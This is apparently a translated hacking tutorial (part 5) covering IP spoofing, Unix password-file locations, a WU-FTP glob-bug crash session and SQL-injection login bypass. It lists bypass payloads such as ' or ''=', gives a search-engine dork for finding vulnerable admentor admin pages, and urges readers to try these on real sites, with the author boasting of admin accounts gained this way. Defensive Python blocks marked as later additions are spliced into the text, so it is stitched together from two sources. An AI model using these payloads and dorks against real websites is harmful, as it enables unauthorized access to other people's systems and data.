TCP/IP stands for Transmission Control Protocol / Internet Protocol. A TCP/IP packet is a block of data to which a header is attached before it is sent to another computer; this is how the internet transmits data, by sending packets. The header of a packet contains the IP address of the sender. A packet can be rewritten so that it appears to come from someone else!! This is used to find ways into many systems without being caught. You will need to run Linux or have a program that lets you do this.
32. What is Linux:
In the original sense, Linux is the kernel of the OS. The kernel is the software responsible for communication between application programs and the hardware. It provides features such as file management, virtual memory management, and support for input/output devices such as the hard drive, monitor and keyboard. But the Linux kernel alone is not yet an OS, so it must be combined with the applications written by the GNU organization to create a complete operating system: the Linux operating system. This is also why we see GNU/Linux when referring to Linux.
Next, a company or an organization packages these products (kernel and application programs), adjusts some configuration to carry the identity of that company/organization, and adds an installation process for that Linux set; the result is called a distribution. Distributions differ in the number and kind of software packaged, in the installation process, and in the kernel version. Some of today's major Linux distributions are Debian, Redhat, Mandrake, Slackware and Suse.
33. Basic commands to know when using or entering Linux systems:
34. Basic insights around Linux:
a. Some important directories on the server:
b. The file location contains passwd of several different versions:
CODE
System                 Password file                     Token in /etc/passwd
AIX 3                  /etc/security/passwd              !
                       /tcb/auth/files//
A/UX 3.0s              /tcb/files/auth/?/*
BSD4.3-Reno            /etc/master.passwd                *
ConvexOS 10            /etc/shadpw                       *
ConvexOS 11            /etc/shadow                       *
DG/UX                  /etc/tcb/aa/user/                 *
EP/IX                  /etc/shadow                       x
HP-UX                  /.secure/etc/passwd               *
IRIX 5                 /etc/shadow                       x
Linux 1.1              /etc/shadow                       *
OSF/1                  /etc/passwd[.dir|.pag]            *
SCO Unix #.2.x         /tcb/auth/files//
SunOS 4.1+c2           /etc/security/passwd.adjunct      ##username
SunOS 5.0              /etc/shadow
System V Release 4.0   /etc/shadow                       x
System V Release 4.2   /etc/security/* database
Ultrix 4               /etc/auth[.dir|.pag]              *
UNICOS                 /etc/udb                          *
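The table above is only useful to an administrator if the hashes really do live in the protected file and nowhere else. As an added defensive check (not part of the original article), here is a small Python audit of passwd-format text that flags a hash still sitting in the world-readable passwd file instead of the shadow file, an empty password field, and any extra UID 0 account. The sample passwd content, the hash string and the token list are constructed for the example; the token list is an assumption drawn from the table, not an exhaustive one.

```python
# Tokens that mean "the real hash lives in the shadow file" or "account locked".
# This set is an assumption for the example, derived from the table above.
SHADOW_TOKENS = {"x", "*", "!", "!!", "*LK*", "NP"}

# Constructed sample /etc/passwd content (not real data); the hash is a dummy.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$1$saltsalt$qJH7.N4xYta3aEG/dfqo/0:1001:1001::/home/legacy:/bin/sh
guest::1002:1002:guest:/home/guest:/bin/sh
toor:x:0:1003:second superuser:/home/toor:/bin/sh
"""


def audit_passwd(text):
    """Return a list of (user, issue) findings for passwd-format text.

    Flags three classic weaknesses: a password hash stored in the
    world-readable passwd file instead of the shadow file, an empty
    password field (login without a password), and a UID 0 account
    other than root.
    """
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in SHADOW_TOKENS:
            findings.append((user, "hash stored in passwd, not shadow"))
        if uid == "0" and user != "root":
            findings.append((user, "UID 0 account other than root"))
    return findings


def shadow_mode_ok(st_mode):
    """True when a shadow file's mode grants no access to 'other' (e.g. 0o640)."""
    return (st_mode & 0o007) == 0


if __name__ == "__main__":
    for user, issue in audit_passwd(SAMPLE_PASSWD):
        print(f"{user}: {issue}")
    # On a live system you would pass os.stat("/etc/shadow").st_mode here.
    print("0o640 acceptable:", shadow_mode_ok(0o640))
```

Run it against a real file with `audit_passwd(open("/etc/passwd").read())`; the findings list is empty on a correctly shadowed system.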
35. Exploiting Linux through security holes in the WU-FTP server:
WU-FTP Server (developed by Washington University) is FTP server software used quite commonly on Unix and Linux systems (all distributions: Redhat, Caldera, Slackware, Suse, Mandrake, ...) and on Windows. Through a bug in its file-name globbing code, which lets an attacker overwrite memory inside the server process, hackers can execute their commands remotely.
However, exploiting this bug is not easy, because the following conditions must be met:
+ You must have an account on the server.
+ You must put shellcode into the memory of the server process.
+ You must send a special FTP command containing a crafted globbing pattern without the server detecting an error.
+ The hacker overwrites a function or code with the shellcode, which will then be executed by the FTP server itself.
Let us analyze the following example session against the FTP server:
CODE
ftp> open localhost <== open a connection to the local FTP server
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready. <== connected to the FTP server
Name (localhost:root): anonymous <== enter the user name here
331 Guest login ok, send your complete e-mail address as password.
Password: ......... <== enter the password here
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== the client uses binary mode for transfers
ftp> ls ~{ <== directory listing command with the crafted glob pattern
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
# ps ax | grep ftpd <== in a second terminal, find the ftpd child process
 1405 ?     S    0:00 ftpd: accepting connections on port 21 <== accepting connections on port 21
 7611 tty3  S    1:29 gdb /usr/sbin/wu.ftpd
26256 ?     S    0:00 ftpd: sasha: anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3  R    0:00 bash -c ps ax | grep ftpd
(gdb) attach 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== attach to the wu.ftpd process to exploit the bug
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
I have not yet managed to exploit this bug successfully (I do not know where it goes wrong). If you can, post it so that I know.
Currently Linux has very few bugs (especially Redhat); please wait for any new bug, and the 'Security hole' section will update immediately. For how to exploit them, ask the manager of that section, especially Leonhart, who diligently answers you.
(Based on the article by brother Binhnx2000)
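The session above shows what the server sees before the crash: an ordinary anonymous login followed by a LIST whose argument is a malformed glob (`~{`). From the defender's side, that command argument is the observable artifact. The following Python detector is an added example, not part of the original article: it scans FTP command log lines for glob arguments that combine a tilde with brace expansion, have unbalanced braces, or are oversized, and reports the process id and client that sent them. The log line layout (`pid client COMMAND argument`), the sample lines and the 256-byte threshold are all constructed assumptions for the example; real servers log in their own formats, so adapt the parser accordingly.

```python
import re

# Constructed sample FTP command log (not from the page). The last line carries
# an oversized argument built in code so the sample stays readable.
LOG_LINES = [
    "26256 127.0.0.1 USER anonymous",
    "26256 127.0.0.1 PASS guest@example.com",
    "26256 127.0.0.1 LIST ~{",
    "26257 10.0.0.9 LIST /pub",
    "26258 10.0.0.7 NLST ~{a,b}",
    "26259 10.0.0.8 RETR readme.txt",
    "26260 10.0.0.4 CWD " + "A" * 300,
]
SAMPLE_FTP_LOG = "\n".join(LOG_LINES) + "\n"

# Commands whose argument is a path and therefore passes through globbing.
PATH_COMMANDS = {"LIST", "NLST", "STAT", "RETR", "STOR", "DELE",
                 "CWD", "MKD", "RMD", "SIZE", "MDTM"}
MAX_ARG_LEN = 256  # assumed threshold for this example

# A tilde (home-directory expansion) immediately combined with a brace group.
TILDE_BRACE = re.compile(r"~[^\s/]*\{")


def glob_reasons(arg):
    """Return the list of reasons a glob argument looks malformed (empty if clean)."""
    reasons = []
    if TILDE_BRACE.search(arg):
        reasons.append("tilde combined with brace expansion")
    if arg.count("{") != arg.count("}"):
        reasons.append("unbalanced braces")
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized argument")
    return reasons


def scan_ftp_log(text):
    """Return (pid, client, command, reasons) for each suspicious path command."""
    hits = []
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # commands without an argument (e.g. PWD) are not globbed
        pid, client, cmd, arg = parts
        cmd = cmd.upper()
        if cmd not in PATH_COMMANDS:
            continue
        reasons = glob_reasons(arg)
        if reasons:
            hits.append((pid, client, cmd, reasons))
    return hits


if __name__ == "__main__":
    for pid, client, cmd, reasons in scan_ftp_log(SAMPLE_FTP_LOG):
        print(f"pid {pid} from {client}: {cmd} -> {', '.join(reasons)}")
```

A hit here is a reason to look at the ftpd child process (as the `ps ax | grep ftpd` step above does), and on a patched server it is simply a rejected argument worth alerting on.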
36. Learn about SQL Injection:
SQL injection is one of the most popular types of web hacking. By injecting SQL query/command code into input before it is passed to the processing web application, you can log in without a username and password, execute remote commands, retrieve data and gain root access to the SQL server. The attack tool is any web browser, such as Internet Explorer, Netscape, Lynx, etc.
You can find a vulnerable web site by using search engines to look for pages that accept submitted data. Some web pages pass parameters through hidden fields, so you must view the page source. For example, we can identify this page as one that uses submitted data by looking at the code we see with view source:
CODE
Check whether the web page has this bug by entering the login and password as follows:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
If that does not work, you can try the following login and password values:
CODE
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
If successful, you can login without knowing the username and password.
This bug is related to queries, so if you have ever learned about databases, it can be exploited easily just by typing query commands in your browser. If you want to learn more about this bug, look for the vicky group's articles.
37. An example of web hacking through an admentor bug (a type of SQL injection bug):
First go to google.com and search for admentor web sites with the keyword 'allinurl: admentor'.
Usually you will get results like the following:
http://www.someserver.com/admentor/admin/admin.asp
You try entering ' or ''=' into the login and password fields:
CODE
Login: ' or ''='
Password: ' or ''='
If successful, you will get into the web site as admin.
Let us learn how to fix this bug:
+ Filter special characters such as ' " ~ by inserting the JavaScript function in the following code:
CODE
function RemoveBad(strTemp)
{
    // Strip characters commonly used to break out of an SQL string literal
    strTemp = strTemp.replace(/<|>|"|'|%|;|\(|\)|&|\+|-/g, "");
    return strTemp;
}
And call it from within the ASP script:
CODE
var login = RemoveBad(Request.QueryString("login"));
var password = RemoveBad(Request.QueryString("password"));
So we fixed the error.
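To make the bug and the fix concrete, here is an added Python example (not from the original article, and not admentor's code) that builds a constructed in-memory SQLite user table and compares three login routines: one that concatenates the input into the SQL text (the vulnerable pattern), one that binds the input as query parameters, and the concatenating one fed through a Python port of the RemoveBad() blacklist above. The table contents, the `admin`/`s3cret` credentials and the function names are all assumptions for the example. It goes one step beyond the article's fix: parameter binding stops the injection regardless of which characters appear in the input, so the character filter is best treated as defence in depth rather than the primary fix.

```python
import re
import sqlite3


def make_db():
    """Constructed sample user table for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    """The injectable pattern: user input is spliced into the SQL text."""
    sql = ("SELECT login FROM users WHERE login = '" + login
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, login, password):
    """The fix: input is bound as parameters, so it is data, never SQL."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone() is not None


# Python port of the page's RemoveBad() character blacklist.
BAD_CHARS = re.compile(r"[<>\"'%;()&+\-]")


def remove_bad(s):
    """Strip the blacklisted characters, exactly as RemoveBad() does."""
    return BAD_CHARS.sub("", s)


def login_filtered(conn, login, password):
    """The page's approach: filter first, then (still) concatenate."""
    return login_vulnerable(conn, remove_bad(login), remove_bad(password))


# The payload the article uses against the admentor login form.
PAYLOAD = "' or ''='"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, PAYLOAD))  # True
    print("filtered:  ", login_filtered(db, PAYLOAD, PAYLOAD))    # False
    print("safe:      ", login_safe(db, PAYLOAD, PAYLOAD))        # False
    print("safe, real:", login_safe(db, "admin", "s3cret"))       # True
```

The vulnerable routine produces `... WHERE login = '' or ''='' AND password = '' or ''=''`, which is true for every row because the trailing `''=''` is always satisfied; the parameterized routine asks the database for a user whose login is literally the nine-character string `' or ''='`, and finds none.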
You can apply this hack to other web sites that accept submitted data; try it and see. There are very many such Vietnamese web sites, and I have gained quite a few admin accounts by trying this (but I also told them to fix it).
Many pages cannot be logged into with ' or ''=' but only with real nicknames registered on that web site; go to the 'member' link to get an admin's password to test it.
Happy hacking.
In Part 6 I will cover the denial-of-service attack (DoS attack), a powerful attack that caused our powerful HVA web site to be blocked for a short time while the admin was busy drinking all the coffee with nobody watching. The DoS attack methods that have been used will be included.
GOOD LUCK!!!!!!!!!!!!!!!!!!!!
(Part 5) - Author: Anhdenday